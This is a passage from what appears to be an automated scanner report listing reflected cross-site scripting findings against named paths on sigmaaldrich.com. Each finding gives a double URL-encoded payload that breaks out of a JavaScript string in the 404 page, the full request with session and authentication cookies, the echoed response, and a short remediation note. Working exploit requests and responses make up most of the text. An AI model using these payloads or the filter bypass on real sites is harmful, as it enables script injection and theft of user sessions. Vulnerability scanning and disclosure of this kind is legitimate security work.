P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:25 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/countries/united-states7bb6f";alert(1)//820040cd6cb/press-releases/autism-speaks-pr","E404") ;
   </script>
...[SNIP]...

1.258. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/autism-speaks-pr [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/autism-speaks-pr

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd33a%2522%253balert%25281%2529%252f%252f6f95c1398d2 was submitted in the REST URL parameter 5. This input was echoed as fd33a";alert(1)//6f95c1398d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/countries/united-states/press-releasesfd33a%2522%253balert%25281%2529%252f%252f6f95c1398d2/autism-speaks-pr HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:37 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/countries/united-states/press-releasesfd33a";alert(1)//6f95c1398d2/autism-speaks-pr","E404") ;
   </script>
...[SNIP]...

1.259. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/autism-speaks-pr [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/autism-speaks-pr

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7585d%2522%253balert%25281%2529%252f%252f31456334c1f was submitted in the REST URL parameter 6. This input was echoed as 7585d";alert(1)//31456334c1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/countries/united-states/press-releases/autism-speaks-pr7585d%2522%253balert%25281%2529%252f%252f31456334c1f HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:39 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/countries/united-states/press-releases/autism-speaks-pr7585d";alert(1)//31456334c1f","E404") ;
   </script>
...[SNIP]...

1.260. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/biodegradable-polymers [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/biodegradable-polymers

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8bf52%2522%253balert%25281%2529%252f%252f46061b65483 was submitted in the REST URL parameter 1. This input was echoed as 8bf52";alert(1)//46061b65483 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc8bf52%2522%253balert%25281%2529%252f%252f46061b65483/medialib/countries/united-states/press-releases/biodegradable-polymers HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:04 GMT
Content-Length: 28978
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc8bf52";alert(1)//46061b65483/medialib/countries/united-states/press-releases/biodegradable-polymers","E404") ;
   </script>
...[SNIP]...

1.261. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/biodegradable-polymers [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/biodegradable-polymers

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15d84%2522%253balert%25281%2529%252f%252fc733923b809 was submitted in the REST URL parameter 2. This input was echoed as 15d84";alert(1)//c733923b809 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib15d84%2522%253balert%25281%2529%252f%252fc733923b809/countries/united-states/press-releases/biodegradable-polymers HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:10 GMT
Content-Length: 28978
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib15d84";alert(1)//c733923b809/countries/united-states/press-releases/biodegradable-polymers","E404") ;
   </script>
...[SNIP]...

1.262. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/biodegradable-polymers [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/biodegradable-polymers

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18aef%2522%253balert%25281%2529%252f%252f753035582f4 was submitted in the REST URL parameter 3. This input was echoed as 18aef";alert(1)//753035582f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/countries18aef%2522%253balert%25281%2529%252f%252f753035582f4/united-states/press-releases/biodegradable-polymers HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:16 GMT
Content-Length: 28978
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/countries18aef";alert(1)//753035582f4/united-states/press-releases/biodegradable-polymers","E404") ;
   </script>
...[SNIP]...

